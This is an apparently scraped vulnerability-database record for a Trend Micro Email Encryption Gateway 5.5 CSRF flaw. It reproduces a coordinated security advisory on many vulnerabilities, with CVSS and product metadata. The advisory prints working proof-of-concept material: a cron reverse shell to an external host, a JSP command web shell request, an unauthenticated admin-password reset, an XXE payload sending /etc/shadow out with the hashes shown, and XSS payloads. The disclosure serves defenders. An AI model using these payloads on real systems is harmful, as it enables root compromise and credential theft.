var-201803-1789
Vulnerability from variot
A lack of cross-site request forgery (CSRF) protection vulnerability in Trend Micro Email Encryption Gateway 5.5 could allow an attacker to submit authenticated requests to a user browsing an attacker-controlled domain. Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks. Email Encryption Gateway 5.5 Build 1111 and prior versions are vulnerable. The vulnerability stems from the fact that the program does not correctly verify the input submitted by the user. Advisory Information
Title: Trend Micro Email Encryption Gateway Multiple Vulnerabilities Advisory ID: CORE-2017-0006 Advisory URL: http://www.coresecurity.com/advisories/trend-micro-email-encryption-gateway-multiple-vulnerabilities Date published: 2018-02-21 Date of last update: 2018-02-21 Vendors contacted: Trend Micro Release mode: Coordinated release
- Vulnerability Information
Class: Cleartext Transmission of Sensitive Information [CWE-319], External Control of File Name or Path [CWE-73], Insufficient Verification of Data Authenticity [CWE-345], External Control of File Name or Path [CWE-73], Missing Authentication for Critical Function [CWE-306], Cross-Site Request Forgery [CWE-352], Improper Restriction of XML External Entity Reference [CWE-611], Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79], Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79], Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Special Elements used in an SQL Command [CWE-89] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-6219, CVE-2018-6220, CVE-2018-6221, CVE-2018-6222, CVE-2018-6223, CVE-2018-6224, CVE-2018-6225, CVE-2018-6226, CVE-2018-6226, CVE-2018-6227, CVE-2018-6228, CVE-2018-6229, CVE-2018-6230
- The encryption and decryption of email on the TMEEG client is controlled by a Policy Manager that enables an administrator to configure policies based on various parameters, such as sender and recipient email addresses, keywords, or PCI compliance. Encryption for Email Gateway presents itself as an SMTP interface and delivers email out over an SMTP to configured outbound MTAs.
We also present two additional vectors to achieve code execution from a man-in-the-middle position.
- Vulnerable Packages
.
- Vendor Information, Solutions and Workarounds
Trend Micro published the following Security Notes:
. https://success.trendmicro.com/solution/1119349-security-bulletin-trend-micro-email-encryption-gateway-5-5-multiple-vulnerabilities
- Credits
These vulnerabilities were discovered and researched by Leandro Barragan and Maximiliano Vidal from Core Security Consulting Services. The publication of this advisory was coordinated by Alberto Solino from Core Advisories Team.
- Section 7.4 describes a vulnerability in this console that can be exploited to gain command execution as root. The vulnerable functionality is accessible only to authenticated users, but it is possible to combine 7.4 with the vulnerability presented in section 7.5 to bypass this restriction and therefore execute root commands from the perspective of a remote unauthenticated attacker.
The application does also use an insecure update mechanism that allows an attacker in a man-in-the-middle position to write arbitrary files and install arbitrary RPM packages, leading to remote command execution as the root user.
Additional Web application vulnerabilities were found, including cross-site request forgery (7.6), XML external entity injection (7.7), several cross-site scripting vulnerabilities (7.8, 7.9, 7.10), and SQL injection vulnerabilities (7.11, 7.12, 7.13).
7.1. Insecure update via HTTP
[CVE-2018-6219] Communication to the update servers is unencrypted. The following URL is fetched when the application checks for updates:
/----- [Request #1] http://downloads.privatepost.com/files/TMEEG/updates/data.html -----/
The product expects to retrieve a plain-text file with the following format:
/----- [Version Info] [Installation RPM file name] [Path to release notes] -----/
If a new update is found, then the RPM file is downloaded from the following URL:
/----- [Request #2] http://downloads.privatepost.com/files/TMEEG/updates/[Installation RPM file name] -----/
This means that the product does not do any kind of certificate validation or public key pinning, which makes it easier for an attacker to eavesdrop and tamper the data.
7.2. Arbitrary file write leading to command execution
[CVE-2018-6220] The following code snippet is responsible for downloading the update file (com/identum/pmg/web/CheckForUpdates.java):
/----- FileDownload fd = new FileDownload(); if (!fd.download(updateURLRoot + "/" + rpmFileName, "/tmp/" + rpmFileName)) { return 10; } [...] -----/
The rpmFileName variable is controlled by the attacker, as it is taken from the aforementioned update file. As a consequence, the attacker controls the path where the update file is going to be downloaded. The RPM file is written by the root user with 0644 permissions. Being able to write to the file system as root opens the door to several code execution vectors on Linux machines.
In this PoC we present one vector which consist on creating a cron job on /etc/cron.d directory.
The attacker can send the following response to [Request #1]:
/----- HTTP/1.1 200 OK Content-Type: text/html Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Tue, 23 May 2017 14:39:46 GMT Connection: close Content-Length: 26
5.7 ../../../../../../../etc/cron.d/test test.html -----/
As a result, the server will create the file /etc/cron.d/test. Its contents are also controlled by the attacker. When the update launches, the appliance will download it from the following URL:
/----- http://downloads.privatepost.com/files/TMEEG/updates/../../../../../../../etc/cron.d/test -----/
The attacker can tamper the server's response and inject arbitrary data, such as a reverse shell payload:
/----- * * * * * root /bin/bash -i >& /dev/tcp/external_server/1080 0>&1 -----/
gaining code execution upon exploitation:
/----- $ sudo nc -lvvp 1080 Listening on [0.0.0.0] (family 0, port 1080) Connection from [server] port 1080 [tcp/socks] accepted (family 2, sport 52171) bash: no job control in this shell [root@ localhost ~]# id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=user_u:system_r:unconfined_t -----/
7.3. Unvalidated software updates
[CVE-2018-6221] The update mechanism described in 7.2 does not validate the RPM file downloaded.
An attacker in a man-in-the-middle position could tamper with the RPM file and inject its own.
The following code snippet is responsible for installing the unvalidated RPM (com/identum/pmg/web/CheckForUpdates.java):
/----- try { System.out.println("running file:"); System.out.println("rpm --upgrade --nodeps /tmp/" + rpmFileName);
Process process = Runtime.getRuntime().exec("rpm --upgrade
--nodeps /tmp/" + rpmFileName); [..] { -----/
In the following Proof of Concept, we crafted a malicious RPM file that executes a reverse shell once opened. This can be achieved by adding a reverse shell script to %pre section of RPM's SPEC file, which is executed previous to any installation step. As can be seen, this results in code execution as root:
/----- $ sudo nc -lvvp 1080 Listening on [0.0.0.0] (family 0, port 1080) Connection from [server] port 1080 [tcp/socks] accepted (family 2, sport 40445) bash: no job control in this shell [root@ localhost /]# id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=root:system_r:rpm_script_t:SystemLow-SystemHigh -----/
7.4. Arbitrary logs location leading to command execution
[CVE-2018-6222] The location of the log files can be changed in the logConfiguration.do page. MimeBuildServer logs are particularly interesting because its contents can be controlled by an attacker.
The first step is to point the log file to the Web application root. The following request redirects MimeBuildServer logs to /opt/tomcat/webapps/ROOT/pepito.jsp and enables full debug logs:
/----- POST /logConfiguration.jsp HTTP/1.1 Host: [server] User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0) Gecko/20100101 Firefox/53.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: https://[server]/logConfiguration.do Content-Type: application/x-www-form-urlencoded Content-Length: 798 Cookie: JSESSIONID=9363824A3BA637A8CC5B51955625075B DNT: 1 Connection: close Upgrade-Insecure-Requests: 1
client0=KeyManager&warnLevel0=3&infoLevel0=1&debugLevel0=0&path0=%2Fvar%2Flog%2Fppg%2Fkeymanserver.log&client1=LauncherServer&warnLevel1=3&infoLevel1=1&debugLevel1=0&path1=%2Fvar%2Flog%2Fppg%2Flauncher.log&client2=KeyManagerClient&warnLevel2=3&infoLevel2=1&debugLevel2=0&path2=%2Fvar%2Flog%2Fppg%2Fkeymanclient.log&client3=MTAInterface&warnLevel3=3&infoLevel3=1&debugLevel3=0&path3=%2Fvar%2Flog%2Fppg%2Fmtainterface.log&client4=PolicyManagerServer&warnLevel4=3&infoLevel4=1&debugLevel4=0&path4=%2Fvar%2Flog%2Fppg%2Fpolicymanager.log&client5=SupervisorServer&warnLevel5=0&infoLevel5=3&debugLevel5=0&path5=%2Fvar%2Flog%2Fppg%2FSupervisorServer.log&client6=MimeBuilderServer&warnLevel6=3&infoLevel6=3&debugLevel6=3&path6=%2Fopt%2Ftomcat%2Fwebapps%2FROOT%2Fpepito.jsp&action=logConfiguration%3Apostback -----/
The second step is to update the MimeBuilder configuration and insert arbitrary JSP code. One candidate is the "Encrypted meeting request email message" form.
/----- POST /mimebuilderconfig.jsp HTTP/1.1 Host: [server] User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0) Gecko/20100101 Firefox/53.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: https://[server]/MimeBuilderConfig.do Content-Type: application/x-www-form-urlencoded Content-Length: 2915 Cookie: JSESSIONID=9363824A3BA637A8CC5B51955625075B DNT: 1 Connection: close Upgrade-Insecure-Requests: 1
addEncryptionXHeader=on&encryptionXHeader=X-TMEEG-ENCRYPTED&addDecryptionXHeader=on&decryptionXHeader=X-TMEEG-DECRYPTED&addDecryptionNotice=off&decryptionNotice=javascript%3A%2F%3C%2Fscript%3E%3Csvg%2Fonload%3D%27%2B%2F%22%2F%2B%2Fonmouseover%3D1%2F%2B%2F%5B%2F%5B%5D%2F%2B%28%28new%28Image%29%29.src%3D%28%5B%5D%2B%2F%5C%2Ffud3uvq5miuqpikdqya3wzicu30woofc7z2nr%5C.burpcollaborator.net%2F%29.replace%28%2F%5C%5C%2Fg%2C%5B%5D%29%29%2F%2F%27%3E&errorOnVerificationFailure=off&meetingRequestEmailText=%3C%25%40+page+import%3D%22java.util.%2Cjava.io.%22%25%3E%0D%0A%3C%25%0D%0A%2F%2F%0D%0A%2F%2F+JSP_KIT%0D%0A%2F%2F%0D%0A%2F%2F+cmd.jsp+%3D+Command+Execution+%28unix%29%0D%0A%2F%2F%0D%0A%2F%2F+by%3A+Unknown%0D%0A%2F%2F+modified%3A+27%2F06%2F2003%0D%0A%2F%2F%0D%0A%25%3E%0D%0A%3CHTML%3E%3CBODY%3E%0D%0A%3CFORM+METHOD%3D%22GET%22+NAME%3D%22myform%22+ACTION%3D%22%22%3E%0D%0A%3CINPUT+TYPE%3D%22text%22+NAME%3D%22cmd%22%3E%0D%0A%3CINPUT+TYPE%3D%22submit%22+VALUE%3D%22Send%22%3E%0D%0A%3C%2FFORM%3E%0D%0A%3Cpre%3E%0D%0A%3C%25%0D%0Aif+%28request.getParameter%28%22cmd%22%29+%21%3D+null%29+%7B%0D%0A++++++++out.println%28%22Command%3A+%22+%2B+request.getParameter%28%22cmd%22%29+%2B+%22%3CBR%3E%22%29%3B%0D%0A++++++++Process+p+%3D+Runtime.getRuntime%28%29.exec%28request.getParameter%28%22cmd%22%29%29%3B%0D%0A++++++++OutputStream+os+%3D+p.getOutputStream%28%29%3B%0D%0A++++++++InputStream+in+%3D+p.getInputStream%28%29%3B%0D%0A++++++++DataInputStream+dis+%3D+new+DataInputStream%28in%29%3B%0D%0A++++++++String+disr+%3D+dis.readLine%28%29%3B%0D%0A++++++++while+%28+disr+%21%3D+null+%29+%7B%0D%0A++++++++++++++++out.println%28disr%29%3B+%0D%0A++++++++++++++++disr+%3D+dis.readLine%28%29%3B+%0D%0A++++++++++++++++%7D%0D%0A++++++++%7D%0D%0A%25%3E%0D%0A%3C%2Fpre%3E%0D%0A%3C%2FBODY%3E%3C%2FHTML%3E%0D%0A%0D%0A&encryptionVersion=zd&replyToSender=on&replyToAll=on&replyForward=on&zdMainTemplate=EncryptedMessageTemplate.html&zdAttachmentTemplate=EncryptedAttachmentTemplate.html&zdAttachmentPayloadTemplate=EncryptedAttachmentPayloadTemplate.html&preProcessMaxBlockSize=1914&preProcessMainDelimeter=%22%5C%3E%0D%0A%3Cinput+type%3D%22hidden%22+name%3D%22ibeMessage%22+id%3D%22ibeMessagePart__%5BAUTONUM%5D__%22+value%3D%22%0D%0A&preProcessInlineDelimeter=%22%5C%3E%0D%0A%3Cinput+type%3D%22hidden%22+name%3D%22ibeInline%22+id%3D%22ibeInlinePart__%5BAUTONUM%5D__%22+value%3D%22%0D%0A&b64EncodeAttachments=off&replyToSenderZdv4=on&replyToAllZdv4=on&replyForwardZdv4=on&zdMainTemplateZdv4=V4EncryptedMessageTemplate.htmlbt0ly&preProcessMaxBlockSizeZdv4=1914&preProcessMainDelimeterZdv4=%22%3E+%3Cinput+type%3D%22hidden%22+name%3D%22ibeMessage%22+id%3D%22ibeMessagePart__%5BAUTONUM%5D__%22+value%3D%22&preProcessInlineDelimeterZdv4=%22%3E+%3Cinput+type%3D%22hidden%22+name%3D%22ibeInline%22+id%3D%22ibeInlinePart__%5BAUTONUM%5D__%22+value%3D%22&b64EncodeAttachmentsZdv4=off&maxProcessThreads=10&mimeBuilderAction=mimeconfig%3Apostback -----/
The next time the service components are restarted, the log file will be created with the desired JSP code.
With the sample JSP code from the previous request, the attacker would then navigate to pepito.jsp and execute arbitrary commands as root:
/----- https://[server]/pepito.jsp?cmd=id
Command: id
uid=0(root) gid=0(root) context=system_u:system_r:java_t -----/
7.5. Missing authentication for appliance registration
[CVE-2018-6223] The registration endpoint is provided for system administrators to configure the virtual appliance upon deployment. However, this endpoint remains accessible without authentication even after the appliance is configured, which would allow attackers to set configuration parameters such as the administrator username and password.
The following request changes the administrator password to "sombrero":
/----- POST /register.jsp HTTP/1.1 Host: [server] Content-Type: application/x-www-form-urlencoded Content-Length: 414
action=register%3Apostback&activationCode1=EE&activationCode2=XXXX&activationCode3=XXXX&activationCode4=XXXX&activationCode5=XXXX&activationCode6=XXXX&activationCode7=XXXX&resellerCode=&hostName=tester.localdomain®Email=pentester1@coresecurity.com&contactName=Test+Test&contactEmail=pentester1@coresecurity.com&contactPhone=%2B5491145712447&userName=administrator&password=sombrero&confirmPassword=sombrero -----/
Note that a valid activation code is required. This code can be easily obtained by requesting a trial from Trend Micro's website.
7.6.
This vulnerability can be chained with 7.4 and lead to remote command execution. It could also be abused to force updates once the attacker is in a man-in-the-middle position to exploit 7.2 or 7.3, which would also lead to remote command execution.
The following proof of concept starts the check for updates process.
/-----
-----/
7.7. XML external entity injection in configuration.jsp
[CVE-2018-6225] The pciExceptionXml parameter of the configuration.jsp script is vulnerable to XML external entity injection.
The following proof of concept uses external entities to send the /etc/shadow file to an external server.
/----- POST /configuration.jsp HTTP/1.1 Host: [server] User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 938 Cookie: JSESSIONID=E8357364AE748ACB904BE6E34F47F2DB Connection: close Upgrade-Insecure-Requests: 1
incomingPort=25&externalHost=&outboundExternalPort=25&internalHost=&outboundInternalPort=25&pciUseSemantics=on&pciScanAttachments=on&pciExceptionbetween0=on&pciExceptionbetween1=on&pciExceptionText0=on&enabledInput=on&exceptionInput=&enabledInput=on&editExceptionInput=&enabledInput=on&startInput=&endInput=&enabledInput=on&startInput=&endInput=&action=configuration%3Apostback&pciExceptionXml=<%3fxml+version%3d"1.0"+encoding%3d"utf-8"%3f>
+<!ENTITY+%25+dtd+SYSTEM+"http%3a//external_server/combine.dtd">
%25dtd%3b]>
The combine.dtd file is hosted on an external server, and its contents are:
/-----
<!ENTITY % all "<!ENTITY send SYSTEM 'gopher://external_server:1080/?%file;'>"> %all;
$ sudo nc -lvvp 1080 Listening on [0.0.0.0] (family 0, port 1080) Connection from [server] port 1080 [tcp/socks] accepted (family 2, sport 49676) root:$1$8PtHrAEM$DmIkWpxYSOzhM0KLJGZvY/:14090:0:99999:7::: bin::14089:0:99999:7::: daemon::14089:0:99999:7::: adm::14089:0:99999:7::: lp::14089:0:99999:7::: sync::14089:0:99999:7::: shutdown::14089:0:99999:7::: halt::14089:0:99999:7::: mail::14089:0:99999:7::: news::14089:0:99999:7::: uucp::14089:0:99999:7::: operator::14089:0:99999:7::: games::14089:0:99999:7::: gopher::14089:0:99999:7::: ftp::14089:0:99999:7::: nobody:*:14089:0:99999:7::: rpm:!!:14089:0:99999:7::: dbus:!!:14089:0:99999:7::: exim:!!:14089:0:99999:7::: nscd:!!:14089:0:99999:7::: vcsa:!!:14089:0:99999:7::: rpc:!!:14089:0:99999:7::: sshd:!!:14089:0:99999:7::: pcap:!!:14089:0:99999:7::: haldaemon:!!:14089:0:99999:7::: postgres:!!:14090:::::: tomcat:!!:14090:0:99999:7::: xfs:!!:14179:::::: postfix:!!:14194:::::: -----/
These actions require the user to be authenticated within the Web console, so an attacker would need to obtain valid credentials first. Possible vectors to achieve this include exploiting any of the XSS issues described in 7.8, 7.9 and 7.10, or leveraging the XSRF vulnerability described in 7.6.
7.8. Reflected cross-site scripting in keymanserverconfig.jsp
[CVE-2018-6226] The deniedKeysExpireTimeout and keyAge parameters of the keymanserverconfig.jsp script are vulnerable to cross-site scripting.
The following is a proof of concept to demonstrate the vulnerability:
/----- https://[server]/keymanserverconfig.jsp?keyAge=3&keyAgeUnits=m&deniedKeysExpireTimeout=6000yta9q%22%3e%3cscript%3ealert(1)%3c%2fscript%3ekb4w2xa9v0d&keymanServerAction=kmsconfig%3Apostback -----/
7.9. Reflected cross-site scripting in mimebuilderconfig.jsp
[CVE-2018-6226] The following parameters of the mimebuilderconfig.jsp script are vulnerable to cross-site scripting: decryptionXHeader, encryptionXHeader, meetingRequestEmailText, zdAttachmentPayloadTemplate, zdAttachmentTemplate, zdMainTemplate, zdMainTemplateZdv4.
The following is a proof of concept to demonstrate the vulnerability:
/----- https://[server]/mimebuilderconfig.jsp?zdMainTemplateZdv4=%22%3E%3Cscript%3Ealert(1)%3C/script%3E -----/
7.10. Stored cross-site scripting in editPolicy.jsp
[CVE-2018-6227] The hidEmails parameter of the editPolicy.jsp script is vulnerable to cross-site scripting.
The following request adds a policy for the email address "":
/----- POST /editPolicy.jsp HTTP/1.1 Host: [server] User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0) Gecko/20100101 Firefox/53.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: https://[server]/policies.jsp Content-Type: application/x-www-form-urlencoded Content-Length: 136 Cookie: JSESSIONID=7D25474429E52C823C63357255A5E781 DNT: 1 Connection: close Upgrade-Insecure-Requests: 1
action=editPolicy%3Apostback&hidEmails=&hidConditions=&hidRuleId=1&hidDelete=&ruleResult=3&ruleTarget=3&envId=1 -----/
The input will be stored unescaped and rendered every time the policies.do script is executed.
Excerpt of the policies.do source showing the injected script tag:
/-----
{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201803-1789", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "email encryption gateway", "scope": "eq", "trust": 1.6, "vendor": "trendmicro", "version": "5.5" }, { "model": "email encryption gateway", "scope": "eq", "trust": 0.8, "vendor": "trend micro", "version": "5.5" }, { "model": "email encryption gateway build", "scope": "eq", "trust": 0.3, "vendor": "trend micro", "version": "5.51111" }, { "model": "email encryption gateway build", "scope": "eq", "trust": 0.3, "vendor": "trend micro", "version": "5.51107" }, { "model": "email encryption gateway build", "scope": "eq", "trust": 0.3, "vendor": "trend micro", "version": "5.51073" }, { "model": "email encryption gateway build", "scope": "ne", "trust": 0.3, "vendor": "trend micro", "version": "5.51129" } ], "sources": [ { "db": "BID", "id": "103435" }, { "db": "JVNDB", "id": "JVNDB-2018-002793" }, { "db": "NVD", "id": "CVE-2018-6224" }, { "db": "CNNVD", "id": "CNNVD-201802-661" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:trendmicro:email_encryption_gateway:5.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2018-6224" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Leandro Barragan and Maximilian Vidal for Core Security Consulting and Vahagn Vardanyan.", "sources": [ { "db": "BID", "id": "103435" } ], "trust": 0.3 }, "cve": "CVE-2018-6224", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": true, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Medium", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 6.8, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "CVE-2018-6224", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "VHN-136256", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 2.8, "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 8.8, "baseSeverity": "High", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "CVE-2018-6224", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "Required", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2018-6224", "trust": 1.8, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201802-661", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-136256", "trust": 0.1, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2018-6224", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-136256" }, { "db": "VULMON", "id": "CVE-2018-6224" }, { "db": "JVNDB", "id": "JVNDB-2018-002793" }, { "db": "NVD", "id": "CVE-2018-6224" }, { "db": "CNNVD", "id": "CNNVD-201802-661" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "A lack of cross-site request forgery (CSRF) protection vulnerability in Trend Micro Email Encryption Gateway 5.5 could allow an attacker to submit authenticated requests to a user browsing an attacker-controlled domain. \nExploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks. \nEmail Encryption Gateway 5.5 Build 1111 and prior versions are vulnerable. The vulnerability stems from the fact that the program does not correctly verify the input submitted by the user. *Advisory Information*\n\nTitle: Trend Micro Email Encryption Gateway Multiple Vulnerabilities\nAdvisory ID: CORE-2017-0006\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/trend-micro-email-encryption-gateway-multiple-vulnerabilities\nDate published: 2018-02-21\nDate of last update: 2018-02-21\nVendors contacted: Trend Micro\nRelease mode: Coordinated release\n\n2. *Vulnerability Information*\n\nClass: Cleartext Transmission of Sensitive Information [CWE-319],\nExternal Control of File Name or Path [CWE-73], Insufficient\nVerification of Data Authenticity [CWE-345], External Control of File\nName or Path [CWE-73], Missing Authentication for Critical Function\n[CWE-306], Cross-Site Request Forgery [CWE-352], Improper Restriction of\nXML External Entity Reference [CWE-611], Improper Neutralization of\nInput During Web Page Generation (\u0027Cross-site Scripting\u0027) [CWE-79],\nImproper Neutralization of Input During Web Page Generation (\u0027Cross-site\nScripting\u0027) [CWE-79], Improper Neutralization of Input During Web Page\nGeneration (\u0027Cross-site Scripting\u0027) [CWE-79], Improper Neutralization of\nSpecial Elements used in an SQL Command [CWE-89], Improper\nNeutralization of Special Elements used in an SQL Command [CWE-89],\nImproper Neutralization of Special Elements used in an SQL Command\n[CWE-89]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: Yes\nCVE Name: CVE-2018-6219, CVE-2018-6220, CVE-2018-6221, CVE-2018-6222,\nCVE-2018-6223, CVE-2018-6224, CVE-2018-6225, CVE-2018-6226,\nCVE-2018-6226, CVE-2018-6227, CVE-2018-6228, CVE-2018-6229, CVE-2018-6230\n\n3. The encryption and decryption of email on the TMEEG\nclient is controlled by a Policy Manager that enables an administrator\nto configure policies based on various parameters, such as sender and\nrecipient email addresses, keywords, or PCI compliance. Encryption for\nEmail Gateway presents itself as an SMTP interface and delivers email\nout over an SMTP to configured outbound MTAs. \n\nWe also present two additional vectors to achieve code execution from a\nman-in-the-middle position. \n \n4. *Vulnerable Packages*\n\n. \n\n5. *Vendor Information, Solutions and Workarounds*\n\nTrend Micro published the following Security Notes:\n\n. \nhttps://success.trendmicro.com/solution/1119349-security-bulletin-trend-micro-email-encryption-gateway-5-5-multiple-vulnerabilities\n\n6. *Credits*\n\nThese vulnerabilities were discovered and researched by Leandro Barragan\nand Maximiliano Vidal from Core Security Consulting Services. The\npublication of this advisory was coordinated by Alberto Solino from Core\nAdvisories Team. \n \n7. Section 7.4 describes a vulnerability in this\nconsole that can be exploited to gain command execution as root. The\nvulnerable functionality is accessible only to authenticated users, but\nit is possible to combine 7.4 with the vulnerability presented in\nsection 7.5 to bypass this restriction and therefore execute root\ncommands from the perspective of a remote unauthenticated attacker. \n \nThe application does also use an insecure update mechanism that allows\nan attacker in a man-in-the-middle position to write arbitrary files and\ninstall arbitrary RPM packages, leading to remote command execution as\nthe root user. \n \nAdditional Web application vulnerabilities were found, including\ncross-site request forgery (7.6), XML external entity injection (7.7),\nseveral cross-site scripting vulnerabilities (7.8, 7.9, 7.10), and SQL\ninjection vulnerabilities (7.11, 7.12, 7.13). \n \n7.1. *Insecure update via HTTP*\n\n[CVE-2018-6219]\nCommunication to the update servers is unencrypted. The following URL is\nfetched when the application checks for updates:\n \n/-----\n[Request #1]\n http://downloads.privatepost.com/files/TMEEG/updates/data.html\n-----/\n\nThe product expects to retrieve a plain-text file with the following\nformat:\n\n/-----\n[Version Info]\n[Installation RPM file name]\n[Path to release notes]\n-----/\n\nIf a new update is found, then the RPM file is downloaded from the\nfollowing URL:\n\n/-----\n[Request #2]\nhttp://downloads.privatepost.com/files/TMEEG/updates/[Installation RPM\nfile name]\n-----/\n\nThis means that the product does not do any kind of 